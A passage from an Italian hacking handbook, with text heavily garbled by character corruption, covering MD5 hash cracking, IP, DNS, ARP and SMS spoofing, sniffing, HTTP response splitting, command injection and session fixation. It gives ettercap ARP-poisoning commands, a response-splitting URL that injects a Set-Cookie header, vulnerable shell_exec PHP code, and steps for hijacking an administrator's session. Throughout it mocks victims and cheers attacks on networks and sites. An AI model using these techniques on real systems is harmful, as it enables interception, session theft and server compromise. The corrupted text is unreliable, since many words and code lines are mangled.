diventare un)enorme svantaggio per gli user ( basta infatti compilare il codice del programma con
%ualche Cfunzione indesiderataD in grado di copiare tutto %uello che scrivete e inserirlo dentro un
database a parte , proprio come un -e>logger. Difficilmente un antivirus o altro riusciranno a
riconoscere un programma del genere , %uesto perch* , al contrario dei virus che hanno pi o
meno la stessa struttura , %uesti possono essere modificati da chiun%ue . Fi baster
semplicemente scaricare il PKP dal Csito ufficialeD , mentre evitate assolutamente di scaricare da
siti &arez , pirata o da fonti non attendibili o non certificati .
/l sito ufficiale di PKP * ( http(//&&&.pgp.com
9ash
, %ualcuno di voi (e anche a me" * sicuramente capitato di avere sottomano un database magari
bac-uppato da un cms tipo phpEE (che bei ricordi" .
ui parleremo di Hash , che esse siano @D5 , 0>' , SH,<4 o altro . Prenderemo per+ in
considerazione l)@D6 , il sistema pi utilizzato per cifrare documenti , pur essendo molto debole
se non viene usato correttamente .
Bssendo comun%ue una variabile del concetto crittazione , ci limiteremo semplicemente a
spiegare in poche parole come decriptare o crac-are un sistema @D6 .
&erchJ si usa "+ 8
Perch* * diventato ormai uno standard di PHP . Bssendo la maggior parte dei $@S sviluppati con
%uesto linguaggio di programmazione risulta molto pi semplice e veloce utilizzare il sistema
citato .
$ome abbiamo detto , se la pass&ord risulta semplice , * possibile crac-arla in maniera semplice
. Se invece risulta complessa si pu+ sperare nella crac-ata , ma non sempre risulta efficace .
/ metodi che andremo ad analizzare saranno tre (
Bsempio di Hash (
;*5Xae1f50d;Xfe0f5**1cdXcc1+f;f5 : murdercode
Bruteforce
/l bruteforce consiste nel creare hash e di confrontarle con l)hash inviatogli . $onsideriamo il fatto
di dover crac-are un hash tipo [`^ m verr effettuato un controllo del genere (
NYZ : hash da crackare
<rea NNN
NNN : 1
NNN : NYZ 8 NO
<rea NNY
NNY : *
NNY : NYZ 8 NO
<rea NNZ
NNZ : .
NNZ : NYZ 8 NO
<rea NYN
NYN : 0
NYN : NYZ 8 NO
<rea NYZ
NYZ : +
NYZ : NYZ 8 S3
-uindi
NYZ : +
Semplice no A Fiene creata un)hash da una stringa e viene confrontata l)hash creata con %uella
da crac-are . uando viene riscontrata l)hash bruttata con l)hash da crac-are allora avremo il
risultato della hash da crac-are .
Per fare crac-ing di %uesto tipo si pu+ utilizzare il programma <ain e %5el , reperibile nel nostro
forum all)indirizzo http(//infernet.forumup.it .
Dictionary Attack
Simile al brute force , %uesto attacco crea le stringhe da un file contenente delle parole e le
confronta con l)hash da crac-are .
Pur essendo simile a un attacco brute force , %uesto non necessita di dover creare la stringa che
verr convertita poi in @D6 , %uesto perch* nel file di testo sono gi presenti le stringhe da
convertire .
?n dizionario pu+ avere %uesta struttura (
a
a5aca
a5aco
a5 aeterno
a5 anti-uo
a5atino
a5atAIour
a55acchiare
))))))))
Hppure utilizzando %uesta struttura
aEa5acaEa5acoEa5 aeternoEa5 anti-uoEa5atinoEa5atAIourEa55acchiare ))))))
H ancora %uesta struttura
aEa5aca:a5aco:a5 aeterno:a5 anti-uo:a5atino:a5atAIour:a55acchiare ))))))
H altre infinite strutture , dipende ovviamente dal programma che utilizzerete . <ain e %5el pu+
servire , sempre reperibile all)indirizzo http(//infernet.forumup.it .
Rainbow Tables (RT)
Prendendo in considerazione il sistema Dictionar> ,ttac- si * pensato di creare una struttura dati
contenente sia l)hash che la stringa hashata . Uorse * meglio spiegare con un esempio ((P" (
a:;cc12+5[c;f151aX.1c.[[e*1[22*111
a5aca:0[0+*2c10*ca.d*5.112111f2.fd10;1
a5aco:112f.0[5.5Xaae1101*0d*2de[+f5[eX
a5 aeterno:e[f.f0ea25a1;.;1[00*c[2c*.;*c[5.
a5 anti-uo:[*;c1[1c+[+*;*+1[;dde*e+c;c[11ec
a5atino:*101c015*efa50ceae*c20*+Xfad5.c5
a5atAIour:d;*+d5d1cXc+c55...1e1e+d+Xd210X+
a55acchiare:[;X;;a;+.000[e[+d+f[Xfcec[;X211*
Fedete A ,bbiamo gi stringa e hash , %uindi non ci resta che confrontarli ii Solitamente per+
non si utilizza il solito sistema (vedi programmi client" ma si attrezza un portale in grado di
recuperare nel proprio database %ueste 'I . /l motivo A
Eeh , considerando il fatto che creare una 'I non * un processo molto corto , * indispensabile la
collaborazione di molte persone per effettuare una serie di 'I .
Uacendo cosG chiun%ue pu+ usufruire di tutte le tabelle presenti in un portale e pu+ contribuire a
produrne altre .
$onsiderando la 'I presentata sopra , andiamo %uindi a vedere come potrebbe essere la
struttura di un database del genere (
/DYH,SH S chiave primaria di un /D
Stringa S Stringa in chiaro
Hash S Stringa hashata in @D6
@entre eccovi il codice (inventato al momento da me" che pu+ risultare efficace (non * stato
testato , probabilmente ci sar %ualche problema nel codice , ma l)importante * la logica ,
provate comun%ue" (
PA
Rstringa4SRYPHSIa)stringa)b#
QRstringa4 * la stringa che dobbiamo confrontare con il nostro database
R%uer>Sm>s%lY%uer>(CSB!B$I Stringa U'H@ tabella H'DB' E` Stringa DBS$D"
&hile (RrigaSm>s%lYfetchYarra>(R%uer>""
d
if (Rstringa4SRrigaa)Stringa)b"
d
eJit(C!)hash Rstringa4 * presente nel nostro database (D . Rrigaa)Hash)b"#
e
e
Qnb ( Se stiampiamo Rstringa4 in %uel modo siamo affetti da [SS (P
AO
$hiaro il concetto A 1o A B allora fate domande su http(//infernet.forumup.it (eheh d)altronde io
bazzico solo lG"
La teoria della "alt 7assBord
/l discorso delle Salt Pass&ord * assai ampio ( gi 26 anni fa nei sistemi ?niJ si usava la tecnica
delle pass6ord salate , o meglio salt passBord .
/n cosa consiste tutto ci+ A
Semplice . Prendiamo ad esempio la pass&ord ciao . Fengono calcolati ad esempio data di
nascita , username o dati che non possono essere altri . Da lG viene eseguita %uesta operazione (
Fiene creato un algoritmo a parte con %uesti dati personali e vengono aggiunti nel sistema
pass&ord , %uindi la pass&ord in chiaro viene aggiunta all)algoritmo creato e viene tutto hashato.
ciao \ cz (algoritmo creato al momento" S ciaocz
Da %ui viene creato l)algoritmo , poi l)hash (creato in automatico in php" viene decriptato (sempre
in php" e se ne legge l)hash e lo si confronta con la hash che verr inviata al prossimo login .
Eeh , * tutto %ui # ovviamente ci sarebbe da spiegare molto altro , ma preferisco spiegare solo
tutto %uello che si utilizza di CdefaultD oggi . Spero che vi sia stato utile dato che oggi saper
nascondere i propri documenti e i propri dati * di vitale importanza , specie nell)hobb> che
praticate e dala gente che gira .
.ischio
Se siete tanto paranoici da voler crittografare i dati , e %ualcuno vi fotte la chiave o ve la
crac-a . state sicuri che %uello che c)era scritto nel file criptato * stato letto e passato a
chiss chi .
#&D$ "poofing
!os'Q lo "poofing
!o spoofing * la meravigliosa arte di far credere agli altri %uello che non sei . Uate finta di
entrare in una banca che dovete derubare ed entrare a faccia scoperta # siete dei cogWWWi vero A
B) la stessa cosa che succede attaccando un server e si lascia far vedere a tutti chi siete ( anche
se avete intenzione di modificare (provate a cancellare e vi sfacio il muso" i log e poi non ci
riuscite A Folete correre davvero il rischio A $redo proprio di no.
Scherzi a parte , lo spoofing consiste nel contraffare i pacchetti in uscita dal vostro computer
verso la rete # per pacchetto intendiamo una %ualsiasi se%uenza di dati trasmessa su una rete .
Spoofare vuol dire %uindi aggirare una regola di autenticazione , che essa si basa su un indirizzo
/P o su il nome di un host .
\uando occorre effettuare Spoofing 8
/n molti casi . $onsiderando il fatto che ci consegna l)anonimato , possiamo fare %ualsiasi cosa (
mentre possiamo nascondere l)/P anche senza spoofing , ma tramite proJ> , &ingate , soc-s o
altro , con lo Spoofing possiamo nascondere anche molte altre cose , come ad esempio gli
inidirizzi hard&are (@,$ ,ddress" , %uindi * preferibile utilizzare lo Spoofing specie %uando si
ricorre alla gestione di botnet dedicate ad attacchi di negazione di servizio in massa (vedi
sezione ,ttacchi dDoS" .
,ndiamo %uindi a parlare di Spoofing nei vari campi (
/P Spoofing
D1S Spoofing
,'P Spoofing
Des-top Spoofing
=eb Spoofing
S@S Spoofing
Eene , capito il concetto A Se si , cominciamo M
)7 "poofing
,l momento lo spoofing di /P * l)attacco pi diffuso , %uesto perch* * il pi semplice da eseguire .
/l funzionamento * semplice ( le reti aziendali controllano il flusso della rete solo durante la
richiesta degli accessi e ne verifica l)/P di destinazione , mentre non viene verificato l)/P di
provenienza .
Bffettuare lo Spoofing di un /P * molto semplice come abbiamo detto in precedenza ( negli
header del pacchetto da spoofare si trover un campo dedicato proprio alla dichiarazione dell)/P ,
chiamato Source ,ddress , che come valore avr appunto il nostro /P .
Produrre un attacco del genere dun%ue * semplice ( se J vale 4 e noi volessimo che vale ; ,
diamogli valore ; M
$ome abbiamo detto in precedenza l)attacco si basa sulla verifica del server che ospita il servizio
( tanto pi i rapporti di fiducia tra le macchine * alta , pi il nostro attacco risulter efficace .
/l tutto pu+ essere bloccato filtrando gli indirizzi /P sul router # un fire&all , che sia hard&are o
soft&are , non riuscir mai a bloccare un /P spoofing .
Iipi di attacchi di /P Spoofing
)7 spoofing cieco ( l)attac-er riesce a far credere di far parte di un host di una sottorete
%ualsiasi
)7 spoofing non cieco ( l)attac-er , dentro una rete !,1 , fa credere di far parte di un
host che a sua volta fa parte della stessa sottorete in cui * posta la !,1 .
*ttacchi >o" ( !)attac-er cerca di bloccare un host impedendone di offrire servizi oppure
da riutilizzare come zombie .
!o spoofing di un /P riesce a danneggiare pesantemente solo alcune macchine in grado di offrire
un servizio che sono predisposte a %uesto tipo di attacco (
servizi 'P$ ('empote Procedure $all"
servizi che usano l)autenticazione dell)indirizzo /P
Uermi tutti ( sappiamo che inviare e ricevere pacchetti fa parte della navigazione , trasmissione e
tutto %uello che si pu+ fare con internet . 1on possiamo solo spoofare facendo finta che siamo un
altro /P , altrimenti %ua non riceviamo nulla e non abbiamo nessun output da parte del server .
Per %uesto abbiamo bisogno i dire al server sul nostro pacchetto l)indirizzo di ricezione # vogliamo
essere dei polli che andiamo a dire in giro dove vogliamo recuperare tutto A
Bbbene no , non siamo dei polli (almeno lo spero" . ui si entra dentro lo Sniffing , una tecnica
usata per l)ascolto di informazioni in modo illecito (vedete la sezione Sniffing per approfondire" .
$ome si procede A Semplice M
Bcco fatto (
1)Si invia il pacchetto Spoofato
*)3l server risponde al <lient ]1 E un computer preso a caso (magari dalla nostra 5otnet)
.)Si sniffano i pacchetti dal <lient ]1
3& Spoofing e '<& Se-uence Num5er &rediction
Nevin @itnic- , aimh* %uell)uomo era una macchina . $hi di voi * curioso di sapere come @itnic-
combatteva Isomu Shimamura A Se siete curiosi continuate a leggere , o passate al prossimo
paragrafo (P
4. !)attaccante ([" apre diverse connessioni I$P successive per determinare il modo
con cui viene generato il numero di se%uenza I$P sull)host della vittima. uindi
effettua un I$P S>n Ulood di ,, l)host a cui si deve sostituire.
2. !)attaccante invia un pacchetto a E pretendendo di essere , ed imposta il flag S`1
nel pacchetto.
3. E invia un pacchetto ,$N, S`1 ad , che non pu+ riceverlo perch* * sottoposto al
flooding. !)attaccante deve indovinare %uale sar il valore utilizzato nella parte di S`1
del pacchetto basandosi sulle analisi fatte nel punto 4.
5. !)attaccante invia l)ultimo pacchetto dell)handsha-e a 3 passaggi del I$P a E (,$N
al posto di , pi il numero di se%uenza indovinato" ed invia dei comandi a E
impersonando una eventuale relazione di fiducia esistente con ,.
uesto tipo di attacco pu+ essere evitato filtrando l)indirizzo /P sorgente ed
utilizzando soft&are che non utilizzino degli algoritmi che consentano di indovinare i
numeri di se%uenza I$P.
>N" "poofing
/n %uesto attacco viene preso di mira il D1S Server (Domain 1ame Service" o chi si connette ad
esso e ci si cura di creare un portale che sia la copia esatta di %uello hac-ato . $osa significa A
Eeh , significa che possiamo procedere in due modi (
4"Bntrare nel sistema D1S come 'oot , alterare le tabelle degli indirizzi dei nomi puntando il D1S
sul portale da voi creato .
2"@odificare i file hosts dell)utente ( i file hosts sono %uei file che vengono usati ad esempio dai
programmi censura , ossia da una blac-list confrontano i siti Cnon adatti ai minoriD e ne cambiano
il puntamento a tal sito .
"NS Spoofing Server
$i troviamo di fronte a un D1S Server . /l D1S , per chi non lo sapesse , * il nome che viene dato
a un /P per facilitarne il ricordo # la mente umana * abituata a ricordare parole sensate piuttosto
che numeri divisi da punti .
Bsistono tanti tipi di D1S (
D1S Primario (esempio(&&&.infernet<J.it"
D1S Secondario (esempio(http(//infernet.forumup.it"
.....
Subcartella (esempio(http(//&&&.infernet<J.it/hac-er.htm" e via dicendo ...
Se riuscissimo ad hac-are un D1S , che sia esso primario o altro , ci baster puntare il D1S su
una nostra pagina , cosG verr visualizzata la nostra invece di %uella del server dove di solito fa
parte della stessa sottorete .
Bsempio corretto (
<lient :M "NS &rimario :M Sito #eale
Bsempio spoofato (
<lient :M "NS &rimario :M Sito <ontraffatto
"esktop Spoofing
Se riusciamo a prendere il controllo di un computer , magari utilizzando una bac-door o
infettandolo con un virus scritto da noi , * possibile manipolare i file di hosts (su =indo&s [P
N:^>indo6s^SBstem.*^!tc^"rivers" indicandogli %uali D1S sono da deviare .
Bccovi un)immagine di un file hosts di =indo&s (per+ stavo sotto !inuJ eheh (P"(
Fedete 428.;.;.4 A Eene , %uello * l)/P , mentre localhost sar il nostro D1S .
Proviamo a mettere
428.;.;.4 google.it
hihi , a %uesto punto google siete voi M Scherzi a parte ,sapete %uanti danni potete fare con
%uesto piccolo accorgimento A 1eanche la met degli utenti medi che usano =indo&s [P sanno
di %uesta piccola chicca .
*.7 "poofing
!),'P Spoofing * un tema molto interessante , %uesto perch* ci far conoscere un altro lato dello
spoofing , %uindi non pi %uello a livello soft&are , ma %uello a livello hard&are .
,bbiamo visto infatti che spoofare un pacchetto pu+ essere applicato solo se volessimo
nascondere il nostro /P . Hra invece andiamo a vedere come e perch* nascondere un indirizzo
fisico nell),'P , che si basa appunto sul dispositivo di rete collegato (@,$ ,ddress" , %uindi non
pi a un indirizzo /P (soft&are" , ma all)indirizzo fisico (hard&are" .
Uare ,'P Spoofing consiste appunto di inviare alla rete una mappa falsificata di informazioni , sia
al bersaglio , sia alla memoria cache dell),'P . $osa comporta tutto ci+ A Si fa credere al server
che siamo una macchina CfidataD .
,ndiamo a un livello pi tecnico di %uesto attacco .
Dun%ue , come funziona A Eeh , l)attacco sostanzialmente si basa sullo sfruttamento di una
debolezza presente sul protocollo ,'P , ovvero l)autenticazione .
uesta autenticazione viene verificata sull)indirizzo fisico di una macchina , chiamato appunto
@,$ ,ddress , un codice univoco presente su tutte le schede di rete che serve per riconoscerne il
produttore e tante altre piccole informazioni .
% cosa serve il protocollo %#& 8
Serve per gestire la comunicazione tra il @,$ ,ddress e l)/P ,ddress . Solitamente %uesta
CgestioneD viene effettuata prima di una %ualsiasi connessione e si distingue in diversi passaggi (
,$*rp .equest
&$*rp .epl%
B) da considerare il fatto che , per velocizzare le operazioni di connessione , durante il processo di
,rp 'epl> le informazioni vengono memorizzate nella cache dell),'P , chiamata appunto ,'P
cache .Sappiamo tutti che la cache * una memoria con una velocit elevatissima ma di
dimensioni molto ridotte # solitamente i computer della nostra generazione hanno una memoria
prossima ai 2 mb di cache .
Prendiamo in considerazione %uesto scenario (
< ,ttac-er( /P S 4:2.479.4.2, @,$ S ;;(;;(;;([[([[([[
< $lient Q4( /P S 4:2.479.4.3, @,$ S ;;(;;(;;(``(``(``
< $lient Q2( /P S 4:2.479.4.5, @,$ S ;;(;;(;;(^^(^^(^^
!e ,'P , prima dell)attacco , saranno (
< %ttacker
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(__(__(__
4:2.479.4.5, @,$ S ;;(;;(;;(!!(!!(!!
< <lient ]1
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(__(__(__
4:2.479.4.5, @,$ S ;;(;;(;;(!!(!!(!!
< <lient ]*
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(__(__(__
4:2.479.4.5, @,$ S ;;(;;(;;(!!(!!(!!
$osa succeder A $he l)attac-er instrader i @,$ e le sue connessioni a se stesso e le inoltrer
ad altri # in %uesto modo verr semplicemente scaturito un effetto CponteD , ossia l)attac-er
ricever le informazioni richieste e le inoltrer come e dove gli pare . Uacciamo l)esempio dopo
l)attacco per rendere meglio l)idea (
A %ttacker
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(__(__(__
4:2.479.4.5, @,$ S ;;(;;(;;(!!(!!(!!
< <lient ]1
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.5, @,$ S ;;(;;(;;(^^(^^(^^
< <lient ]*
4:2.479.4.2, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.3, @,$ S ;;(;;(;;(^^(^^(^^
4:2.479.4.5, @,$ S ;;(;;(;;(^^(^^(^^
$apito il concetto A /n %uesto modo i $lient pensando di comunicare tra di loro # infatti l)/P *
giusto , ma il @,$ * un altro , %uindi le informazioni verranno inviate al @,$ dell)attac-er
(;;(;;(;;(^^(^^(^^" che poi potr leggerle e inoltrarle a chiun%ue voglia .
Pratica con l),'P Spoofing
1ella rete gira di tutto , programmi di %uesto genere ce ne sono a bizzeffe , per+ consiglio uno
dei pi completi , se non il pi completo dei programmi , dal nome Bttercap .
Sistemi Hperativi Supportati (
=indo&s
!inuJ
WESD
@ac HS[
,lcuni comandi utili
Per fare ,rp Poisoning (o ,'P Spoofing"
ettercap <I <% <@ ,'P /nomeHost4/ /nomeHost2/
Per fare ,rp Spoofing in un intero segmento di rete
ettercap <I <% <@ ,'P // //
"0" "poofing
S@S Spoofing vuol dire inviare S@S (Short @essage Service" dove il mittente viene occultato , in
modo da risultare inesistente o falso . / provider e gli operatori di telefonia mobbile offrono la
possibilit di collegarsi tramite connessione telefonica ad essi per ottenere il servizio di invio S@S
utilizzando appositamente %uesti Kate&a> S@S raggiungibili anche con una normale connessione
via modem .
/ protocolli maggiormente usati da %uesti servizi sono (
4.Ielematic ,pplication Program (I,P"
2.?niversal $omputer Protocol (?$P"
/n particolare %uest)ultimo (?$P" * %uello vulnerabile in %uanto spoofare tali pacchetti * molto
semplice . Easti infatti googlare un po) per trovare programmi adatti a %uesta soluzione , come
ad esempio S@S $lient .
?ltimamente per+ %uesti servizi sono in realt protetti in %uanto stanno prendendo contromisure
molto avanzate , come lo smistamento e all)instradamento degli S@S .
.ischio
B) un attacco che viene preso troppo alla leggera . @olti amministratori di rete se ne
infischiano . Peggio per loro , buon per noi (P
#&A$"niffing
$on il termine "niffing si intende la pratica di intercettare pacchetti di comunicazione , di
controllare il traffico di una rete e di CsniffareD letteralmente tutti %uei dati che transitano in una
rete telematica in modo passivo .
Uare sniffing * una pratica che esiste da oltre 2; anni ( vengono sviluppati tool e programmi
all)avanguardia in grado di fare sniffing ( %uesti programmi vengono chiamati "niffer .
<osa fanno gli Sniffer 8
/ntercettano i dati (sottoforma di pacchetti" , li decodificano in base ai loro livelli (rete , trasporto ,
applicativo e datalin-" e offrono anche delle funzionalit aggiuntive , come l)analisi di tutti i
pacchetti che lavorano sullo stesso protocollo (tipo ?DP" , ne valutano il comportamento o ne
ricostruiscono lo scambio dati fra sistemi e applicazioni .
"niffing traffico locale
Eeh , %ui c)* poco da capire . !a rete * nostra , %uindi possiamo vedere tutto %uello che transita
nella nostra rete . Solitamente si parla di Iraffico !ocale %uando si * connessi direttamente in una
rete , senza ponti di mezzo (router,s&itch,hub ecc..." . !a connessione pu+ essere effettuata poi
con vari mezzi , che essi siano cavi Bthernet , /rda , Eluetooth o tutti %uei mezzi che permettono
di effettuare una connessione diretta con un altro sistema .
Kiustamente potrete analizzare tutti i pacchetti che transitano nel vostro sistema # tuttavia , si
parla di traffico locale anche se fate parte di una rete !,1 , =!,1 o altro e gli altri computer che
dipendono dal vostro sistema possono essere controllati .
Bsempio (
.ete >omestica
$lient Q4 SSSSSSSSSSSSSSSSSOh
Fostro $omputer SSSSSSSSSSSSO )NT-.N-T
$lient Q2 SSSSSSSSSSSSSSSSSOh
!a logica dice che ( se un computer si connette tramite il vostro sistema per andare su /nternet
potete analizzare tutti i pacchetti , inviati e ricevuti , senza dover spulciare tra altri sistemi .
"niffing rete locale
Sniffare una rete locale consiste nell)avere accesso fisico al sistema che instrada , manipola e
organizza tutti i pacchetti di transizione verso altre reti , che essa sia internet o un)altra rete .
Dun%ue , ricapitoliamo ( per rete locale intendiamo un insieme di macchine , di computer e di
altre reti dentro uno spazio delimitato in base alla possibilit ( nel caso in cui la rete * allacciata
tramite cavi diretti si delimita la zona in base alla lunghezza dei cavi , mentre se si parla di rete
&ireless dipende da %uanto * potente il segnale .
Bsempio di 'ete !ocale (
"niffing in rete ethernet non<sBitched
1elle reti ethernet di %uesto tipo dove la connessione * impostata tramite i cavi coassiali , o
ultimamente anche con cavi ?IP o SIP connessi a uno a un hub , * condivisa tutti i pacchetti
vengono destinati agli indirizzi @,$ desiderati (l)indirizzo @,$ * l)indirizzo hard&are o fisico
univoco della schede di rete collegata" .
!o sniffing di una rete non<s&itched consiste nel superare l)impostazione della modalitT
promiscua , altrimenti si rischia di permettere l)ascolto di tutto il traffico della rete che passa sul
cavo che connette l)intera rete .
"niffing in rete ethernet sBitched
!o sniffing di un sistema ethernet s&itchato (italianizziamo v (P" , dove la rete viene gestita
appunto da uno s&itch , consiste di inoltrare su ogni porta il traffico destinato al dispositivo
collegato solo a %uella porta ( %uesto permette %uindi che un)altro sistema non pu+ sniffare il
transito dei pacchetti desstinato a un determinato indirizzo e al broadcast di referenza .
<ome possiamo sniffare tutta la rete 8
Semplicemente attuando del @,$ flooding , ossia scannare in continuazione un range possibile di
@,$ address fino a trovare i sistemi collegati . B) richiesto ovviamente un accesso fisico se si
parla di connessione ethernet , mentre per le reti &ireless * sufficiente fare del &ardriving
(leggete il sommario , c)* un capitolo dedicato apposta" .
"niffing in reti ?eografiche
/ntercettare i dati su reti geografiche vuol dire attuare la tecnica del @an in the middle (che verr
presentata dalla versione ;.5 del libro" . @i dispiace non poterlo presentare subito , * un
argomento vastissimo e richiede %ualche mese di studio e di pratica prima di poterlo trascrivere
sul libro .
.ischio
Sniffare (la rete eh" * divertentissimo e si scoprono un mucchio di cose . B) tuttavia
illegale , ma molto , molto potente come attacco di intercettazione .
#&@$ 9TT7 .esponse "plitting
!)attacco HIIP 'esponse Splitting consiste nell)indirizzare il flusso di navigazione di un utente
dove desiderato . /l modo A Easti studiare una %uer> string ben dettagliata per superare il
programma .
Prendiamo in analisi il codice presentato (
PA
header(Tlocation(T.RYKBIa)var)b"#
AO
Dovremmo sapere a %uesto punto che durante gli header della pagina vengono dichiarate alcune
importanti funzioni , tra cui cito i famosi coo-ie . ,vete mai provato a leggere i coo-ie dopo aver
stampato , %uindi dopo aver finito di impostare gli header A Bbbene , se %ualcuno di voi ha avuto
esperienze in tema dovrebbe sapere che %uesto non * possibile .
Poter iniettare nel server una %ualsiasi pagina &eb facendola eseguire dal =eb Server in cui *
presente la vulnerabilit * un enorme vantaggio per il crac-er # vogliamo fare %ualcosa di
simpatico A
http(//&&&.sitovittima.com/main.phpAvarShttp(//&&&.infernet<J.it/pagina.php];D];,Set<
$oo-ie(]2;coo-ieSvalore
,bbastanza lunghetto , per+ * fattibile ed * anche facile da capire e giusto per poter cambiare
invece di fare i soliti cattivoni (P
Dun%ue , andiamo a gradi (
http//BBB.sitovittima.com ( server vittima
main.php ( pagina buggata
O ( chiusura dell)indirizzo e passaggio di comandi
varR ( variabile buggata
http//BBB.infernet<E.it ( nostro server
pagina.php ( nostra pagina
SF>SF* ( frfn con cui viene chiuso il codice e viene creata una nuova riga dove poter inserire i
prossimi comandi
"et<!oo(ie ( comando per creare e modificare coo-ies
S&F ( * semplicemente lo spazio (C C" in formato HB[
coo(ie ( nome del coo-ie
valore ( valore del coo-ie
,l momento non risulta molto pericoloso giusto A Eene , guardare il capitolo session fiJation per
capirne le vere pericolosit .
Per superare %uesto problema alcuni propongono il metodo (
if (strpos(strtolo&er(RYSB'FB'a)'B?BSIY?'/)b",Tset<coo-ie(T"MSSfalse" eJit#

,nche se , secondo il mio modesto parere , si pu+ utilizzare anche %uesto durante la
dichiarazione degli header (
PA
header(CfD . Tlocation(T.RYKBIa)var)b"#
AO
Personalmente non ne ho avuto modo di testarne la funzionalit di %uest)ultima , contattatemi a
murdercode.gmail.com se non funzionasse .
.ischio
Pur essendo un attacco di grande portata esiste il metodo semplicissimo per fiJarlo . @a
chi l)ha detto che tutti riescono ad accorgersi in tempo di %uesta falla A
#1F$ !ommand )n3ection /laBs
,bbiamo visto come una non curatezza nelle dichiarazioni di variabili e di stringhe possono
risultare pericolose per un $@S o per comun%ue alcuni script =eb . ,d esempio le S! /nVection
puntavano all)esecuzione di codice S! o le [SS eseguivano codice _avascript in lato $lient .
!a !ommand )n3ection /laBs consiste nel passare ad alcune funzioni (exec(), shellRexec(),
sBstem() e altro" per eseguire comandi assai pericolosi .
uesto risulta molto simile al gi citato $ommand /nVection , ma in particolare il $ommand
/nVection Ula&s mira ad attaccare esplicitamente soluzioni &eb con tecnologia PHP .
Si prenda una pagina &eb in %uesto modo (
&agina1)htm
*form id=+form,+ name=+form,+ method=+post+ action=+-agina./php+#
*input tpe=+text+ id=+action+ name=+action+#
*input tpe=+submit+ value=+0nvia 1omando+#
*/form#
&agina*)php
shellYeJec(RYPHSIa)action)b"#
!)attacco si spiega da se # procedendo a scrivere nella barra di testo un %ualun%ue comando ?niJ
ci ritroveremo a comandare da remoto molti dei file che sicuramente l)admin avr dimenticato
di dare i permessi .
Probabilmente nessuno , e ripeto nessuno , vi offrir un codice del genere , anche perch* chi *
%uel pollo che va a dirvi ( Coh ragazzi mettete tutto il codice che vi pare nel mio server MD .
Per+ se l)admin ha intenzione di inviare dei comandi in modo dinamico in base al vostro account A
Potrebbe scrivere una pagina automatizzata con la %uale dire che comandi inviare # e se noi
scaricassimo la pagina e la modificassimo a nostro piacere A
Se l)admin non * un vero e proprio sciocco allora produrr una pagina scritta in %uesto modo
&agina*)php
echo shellYeJec(Tdir T.RYPHSIa)parametriYdir)b"#
.ischio
,ltro attacco di notevole portata e dall)aggiramento piuttosto semplificato , peccato che
anche %ua non ci vuole nulla a fiJare il problema . /l programmatore meno esperto per+
potrebbe farsi scappare %ualche informazione di troppo (P
#1,$ "ession /iEation
!asciamo perdere per un po) l)ideologia su come fottere un sistema , parliamo invece di come
fottere una persona con il sistema ( a volte pu+ sembrare anche logico , ma alcune persone si
dilettano a cercare di superare un sistema %uando invece la risposta * la pi semplice di tutte .
Prendiamo ad esempio il fatto che %ualcuno , anzi noi , ci registrassimo a
http(//infernet.forumup.it #
,/ Eeh , prima di tutto , una volta loggati , ci viene attribuito un ")> valido .
2. ,lla vittima andremo ad indicargli di visualizzare una pagina presente sul forum tramite
un lin- contenente per+ il nostro S/D . Bsempio
http(//infernet/forumup/it/index/php2sid=sad345
6kahsd35.7,h
3. !a vittima eseguir l)accesso al portale tramite i suoi username e pass&ord , anche se la
sessione sar un)altra in %uanto gli abbiamo passato noi il S/D (P
5. , %uesto punto la vittima andr a subire una [SS (vedi $ross Site Scripting" e , tramite il
comando _avascript document.coo-ie , verr riscritta una nuova variabile di sessione .
$ome vedete abbiamo striminzito %uesto capitolo , soprattutto perch* avevamo gi parlato di
coo-ie grabbing e di Jss . $omun%ue sia * una tecnica davvero fantastica , e volete sapere il
perch* A
Se la vittima * un amministratore A Fi lascio immaginare i guai che possono succede (P
.ischio
State attenti a tutto %uello che aprite # c)* gente nella rete che fa veramente di tutto per
fregarvi ... ci volete cascare A 1o vero A Disattivate Vavascript , cancellate i coo-ie ,
insomma , siate paranoici %uando %ualcuno vi lin-a %ualcosa , specie se nel vostro portale
#1&$ 0etasploit
/l 0etasploit non * considerato un tipo di attacco , ma un ambiente di sviluppo progetto per
testare e usare codici eJploit dedicati a testare la sicurezza di una %ualsiasi applicazione &eb .
1ato sotto ambiente ?niJ , * stato poi trasportato anche in altri sistemi operativi come =indo&s ,
HS[ e altri tramite un)emulazione della shell bash (ad esempio su =indo&s c)* una versione light
di $>g&in" .
$ontiene %uasi 2;; eJploit e pa>lod dedicati al pentest del proprio server # * in continuo
aggiornamento e viene appoggiato da una larghissima communit> , in %uanto %uest)applicazione
* stata rilasciata come opensource sotto cop>left .
Sito di referenza ( http(//&&&.metasploit.com
!)utilizzo di tale sistema * semplificato al limite ( si ha bisogno solo di un interprete Perl
aggiornato in grado di eseguire tutti gli eJploit presenti nel database .
Bssendo una soluzione opensource , chiun%ue pu+ supportare la comunit scrivendo e adattando
eJploit di ogni genere . Hvviamente per+ , * richiesta una buona dote da programmatore in
ambiente Perl e una discreta conoscenza del funzionamento di 0etasploit /rameBor( .
#11$ 7ortscanning
$onsideriamo di avere sotto mano l)/P di %ualcuno che ora ha veramente scassato i cartoni
(ovviamente sto semplicemente considerando un fatto , non dovete mica farlo M" # prima di fare
una %ualsiasi operazione (vale anche contro i server" occorre effettuare un controllo su %uali
servizi vengono erogati dall)/P sotto CattaccoD .
$hiamasi 7ortscanning la tecnica che consiste nel testare %uali porte e servizi sono aperti e in
che modo .
Fediamo di chiarire meglio il tutto (
&orta %perta (accepted) ( l)host * in ascolto e accetta connessioni .
&orta <hiusa (denied) ( l)host si rifiuta di erogare servizi da %uella porta .
&orta ,loccata (dropped) ( l)host non risponde da tale porta
&orta =iltrata (filtred) ( la porta * protetta da un filtro (solitamente fire&all" e nega allo
scanner di visualizzare lo stato della porta
/l portscanning di per sL non * pericoloso , in %uanto gli stessi amministratori di rete usano i
portscanner (programmi per fare portscannig" per testare la stessa sicurezza di una rete .
